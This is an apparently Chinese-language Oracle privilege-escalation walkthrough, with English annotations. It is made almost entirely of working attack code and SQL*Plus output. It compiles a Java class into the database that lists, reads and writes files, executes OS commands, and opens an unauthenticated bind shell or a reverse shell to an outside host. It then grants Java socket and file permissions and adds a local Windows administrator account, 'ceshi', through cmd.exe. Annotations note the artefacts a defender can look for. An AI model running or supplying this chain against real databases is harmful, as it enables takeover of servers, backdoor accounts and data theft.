1.利用已知的Oracle用户名连上数据库,并创建java提权函数 (Step 1: connect with a known Oracle account and load the Java helper. The source below is compiled inside the database's own JVM, so its file, process and socket operations run with the OS privileges of the Oracle server process, not with those of the database user.)
- C:/WINDOWS/system32>sqlplus /nolog
- SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
- Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
- SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
- 10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
- 已连接。
- SQL>
- SQL> create or replace and compile java source named paeq as
- 2 import java.io.*;
- 3 import java.net.*;
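public class PAEQ{
    // NOTE(review): this class is compiled into the database's embedded JVM
    // by the "create ... java source" statement above, so every method
    // below runs with the OS privileges of the Oracle server process.  The
    // code is kept at the Java 1.3/1.4 level of that era's Oracle JVM (no
    // generics, no try-with-resources) so it still loads there.  All CRLF
    // literals were garbled to "/r/n" in the transcript and are restored.

    /**
     * Lists the entries of a directory.
     *
     * @param path directory to list
     * @return the entry names, each followed by CRLF; "" when the path is
     *         null, not a directory or unreadable (File.list() returns null)
     */
    public static String listFolder(String path){
        if(path==null){
            return "";
        }
        String[] files=new File(path).list();
        if(files==null){
            return "";
        }
        StringBuffer out=new StringBuffer();
        for(int i=0;i<files.length;i++){
            out.append(files[i]).append("\r\n");
        }
        return out.toString();
    }

    /**
     * Creates or truncates filepath and writes value to it using the JVM's
     * default charset.
     *
     * @return "OK" on success, otherwise the exception message
     */
    public static String saveFile(String filepath,String value){
        FileOutputStream fos=null;
        try {
            fos=new FileOutputStream(filepath);
            fos.write(value.getBytes());
            return "OK";
        } catch (Exception e) {
            return e.getMessage();
        } finally{
            if(fos!=null){
                try {fos.close();} catch (IOException ignored) {}
            }
        }
    }

    /**
     * Reads a text file line by line with the named charset (e.g. "GBK").
     * The lines are concatenated WITHOUT their separators, exactly as the
     * original wrapper did; callers that need line structure must split
     * the file themselves.
     *
     * @return the concatenated lines, or the exception message on failure
     */
    public static String readFile(String pathfile,String code){
        BufferedReader br=null;
        try {
            br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
            StringBuffer value=new StringBuffer();
            String s;
            while((s=br.readLine())!=null){
                value.append(s);
            }
            return value.toString();
        } catch (Exception e) {
            return e.getMessage();
        } finally{
            if(br!=null){
                try {br.close();} catch (IOException ignored) {}
            }
        }
    }

    /**
     * Runs a command line and returns its standard output.
     *
     * Runtime.exec(String) splits the string on whitespace; that is why the
     * callers below wrap commands as "cmd.exe /c ...".  Only stdout is read:
     * stderr is never drained (a command writing a lot there can block on a
     * full pipe) and the exit code is not reported.
     *
     * @param filepath command line to run
     * @param code     charset used to decode the process output (e.g. "GBK")
     * @return the decoded stdout, or the exception message on failure
     */
    public static String execFile(String filepath,String code){
        InputStreamReader isr=null;
        try{
            Process ps=Runtime.getRuntime().exec(filepath);
            isr=new InputStreamReader(ps.getInputStream(),code);
            StringBuffer output=new StringBuffer();
            char[] buf=new char[1024];
            int n;
            while((n=isr.read(buf,0,buf.length))!=-1){
                output.append(buf,0,n);
            }
            return output.toString();
        }catch(Exception e){
            return e.getMessage();
        }finally{
            if(isr!=null){
                try {isr.close();} catch (IOException ignored) {}
            }
        }
    }

    /**
     * Bind shell: listens on port, accepts exactly ONE client and serves it
     * from an optShell thread, which also closes the listener when that
     * session ends.  The call blocks until a client connects.  There is no
     * authentication whatsoever - whoever reaches the port first owns the
     * command loop.
     *
     * @return "OK" once a client is connected, otherwise the exception
     *         message (the listener is released in that case)
     */
    public static String bindShell(int port){
        ServerSocket ss=null;
        try {
            ss=new ServerSocket(port);
            Socket s=ss.accept();
            new optShell(ss,s).start();
            return "OK";
        } catch (Exception e) {
            // The listener was never handed to a worker thread, so without
            // this it would stay bound until the JVM exits.
            if(ss!=null){
                try {ss.close();} catch (IOException ignored) {}
            }
            return e.getMessage();
        }
    }

    /**
     * Reverse shell: connects out to host:port and serves the command loop
     * over that connection from an optShell thread.  No authentication.
     *
     * @return "OK" once connected, otherwise the exception message
     */
    public static String reverseShell(String host,int port){
        try{
            Socket s=new Socket(host,port);
            new optShell(null,s).start();
            return "OK";
        }catch(Exception e){
            return e.getMessage();
        }
    }

    /**
     * One interactive session over a socket.  Protocol: the client sends a
     * line whose first four characters (after trimming) name a command -
     * list, save, read or exec - and is then prompted for the arguments one
     * line at a time; "exit" (or the client hanging up) ends the session and
     * anything else prints the help text.  On exit the socket and, for a
     * bind shell, the listening socket are closed.
     */
    public static class optShell extends Thread{
        OutputStream os=null;
        InputStream is=null;
        ServerSocket ss;
        Socket s;

        public optShell(ServerSocket ss,Socket s){
            this.ss=ss;
            this.s=s;
            try{
                this.is=s.getInputStream();
                this.os=s.getOutputStream();
            }catch(Exception e){
                closeAll();
            }
        }

        public void run(){
            if(is==null||os==null){
                // stream setup failed in the constructor and everything was
                // already closed there; nothing to serve
                return;
            }
            BufferedReader br=new BufferedReader(new InputStreamReader(is));
            String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n";
            try {
                String line=br.readLine();
                // a null line means the peer closed the connection
                while(line!=null && !"exit".equals(line)){
                    String cmd=line.trim();
                    if(cmd.length()>3){
                        cmd=cmd.substring(0,4);
                        if("list".equals(cmd)){
                            send("input you path:\r\n");
                            line=br.readLine();
                            send(listFolder(line));
                        }else if("save".equals(cmd)){
                            send("input you filepath:\r\n");
                            line=br.readLine();
                            send("input you value:\r\n");
                            send(saveFile(line,br.readLine()));
                        }else if("read".equals(cmd)){
                            send("input you filepath:\r\n");
                            line=br.readLine();
                            send("input you code examle:GBK\r\n");
                            send(readFile(line,br.readLine()));
                        }else if("exec".equals(cmd)){
                            send("input you run filepath:\r\n");
                            line=br.readLine();
                            send("input you code examle:GBK\r\n");
                            send(execFile(line,br.readLine()));
                        }else{
                            send(cmdhelp);
                        }
                    }else{
                        send(cmdhelp);
                    }
                    line=br.readLine();
                }
            } catch (Exception e) {
                // NOTE(review): inside the database JVM this presumably ends
                // up in the server's trace output rather than on a console -
                // confirm on the target; it is not sent to the client.
                e.printStackTrace();
            }finally{
                closeAll();
            }
        }

        /**
         * Writes text to the client with the default charset.  A null (for
         * example an exception whose getMessage() is null) is sent as nothing
         * instead of killing the session with a NullPointerException.
         */
        private void send(String text) throws IOException{
            if(text!=null){
                os.write(text.getBytes());
            }
        }

        /** Best-effort close of every handle this session owns. */
        private void closeAll(){
            if(os!=null){ try {os.close();} catch(Exception ignored) {} }
            if(is!=null){ try {is.close();} catch(Exception ignored) {} }
            if(s!=null){ try {s.close();} catch(Exception ignored) {} }
            if(ss!=null){ try {ss.close();} catch(Exception ignored) {} }
        }
    }
}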
- 155 /
- Java 已创建。
- SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
- 2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
- tring';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
- har2
- 2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
- har2
- 2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
- char2
- 2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
- urn java.lang.String';
- 3 /
- 函数已创建。
- SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
- 2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
- 3 /
- 警告: 创建的函数带有编译错误。 (The `/` appended after `';` on the previous line is not the SQL*Plus run terminator - that only works on a line of its own - so it became part of the PL/SQL text and broke the compile; the re-run below without it succeeds.)
- SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
- 2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
- 3 /
- 函数已创建。
2.授予权限 (Step 2: grant Java permissions. This block only succeeds if the connected account is allowed to call DBMS_JAVA.GRANT_PERMISSION - typically the JAVA_ADMIN role or DBA privileges, confirm on the target - so a least-privilege schema stops here. Note that the FilePermission grant covers only cmd.exe; PAEQ_LISTFOLDER, PAEQ_READFILE and PAEQ_SAVEFILE would need comparable grants for the paths they touch. Each grant is recorded in the database's Java policy and is an artefact a defender can look for.)
- SQL> begin
- 2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
- stem32/cmd.exe','read,write,execute,delete');
- 3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
- eFileDescriptor');
- 4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
- pt,connect,listen,resolve');
- 5 end;
- 6 /
- PL/SQL 过程已成功完成。
3.添加操作系统用户 (Step 3: add an OS user. `net user ... /add` and `net localgroup Administrators ... /add` are run through the exec wrapper; they only work because the OS account of the Oracle service is itself allowed to manage local accounts - on Windows that service commonly runs as LocalSystem, but confirm on the target. The transcript shows no output row for either call, so check that the account really exists before relying on it.)
- SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
- add','GBK') from dual;
- PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
- --------------------------------------------------------------------------------
- SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
- trators ceshi /add','GBK') from dual;
- PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
- --------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。 (If Remote Desktop is enabled on the host, the new local administrator account "ceshi" can be used to log in directly. Everything done here leaves artefacts: the PAEQ Java source and the PAEQ_* wrapper functions in the YSREAL schema, the three Java policy grants, and a new local account in the Administrators group - all of which must be removed after an authorised test and are worth alerting on in production.)